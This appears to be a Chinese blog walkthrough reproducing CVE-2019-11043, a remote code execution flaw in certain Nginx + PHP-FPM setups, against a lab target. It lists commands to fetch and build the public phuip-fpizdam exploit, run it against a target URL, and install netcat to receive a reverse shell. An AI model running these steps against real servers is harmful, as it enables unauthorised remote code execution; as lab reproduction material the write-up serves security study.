CVE-2019-11043复现
程序员文章站
2022-03-24 11:02:24
...
-
01
CVE-2019-11043 是一个远程代码执行漏洞,使用某些特定配置的 Nginx + PHP-FPM 的服务器存在漏洞,可允许攻击者远程执行代码。
漏洞环境:
先把exp克隆到本地。
git clone https://github.com/neex/phuip-fpizdam.git
安装go环境
wget -c https://storage.googleapis.com/golang/go1.13.3.linux-amd64.tar.gz
把文件解压到/usr/local 目录
tar -C /usr/local/ -xzf go1.13.3.linux-amd64.tar.gz
编辑/etc/profile,在文件的最后加上
export PATH=$PATH:/usr/local/go/bin
保存退出后执行 source /etc/profile
然后进行编译,在编译的过程中会出现下面的报错,原因是go mod国内被墙了。
所以我们要为go环境变量设置proxy
go env -w GOPROXY=https://goproxy.io,direct
go env -w GOPRIVATE=*.corp.example.com
go env -w GO111MODULE=on
-
02
以上准备好之后就可以利用漏洞了。
漏洞利用:
该靶场在Ip:8080。
用exp执行下面命令
phuip-fpizdam.exe http://x.x.x.x:8080/index.php
然后就可以执行命令了
反弹shell:
给此docer容器装一个 nc
apt-get update
apt-get install -y netcat
然后攻击机开启监听,执行命令等待shell反弹
参考连接:
http://blog.leanote.com/post/snowming/9da184ef24bd
推荐阅读
-
2020KDD-CUP阿里天池一篇baseline复现debiasingRush(一)
-
币币世界打破数字货币壁垒,复现全民增值时代
-
网络安全渗透测试反序列化漏洞分析与复现工作
-
Tensorflow复现DenseNet cifar-10(正确率91%)
-
网络安全渗透测试反序列化漏洞分析与复现工作
-
SpringBoot SpEL表达式注入漏洞-分析与复现
-
「漏洞预警」Apache Flink 任意 Jar 包上传导致远程代码执行漏洞复现
-
线上Bug无法复现怎么办?老司机教你一招,SpringBoot远程调试不用愁!
-
Apache ActiveMQ任意文件写入漏洞(CVE-2016-3088)复现
-
win10完美复现U^2-Net神经网络人物肖像画生成,街头画师都要失业了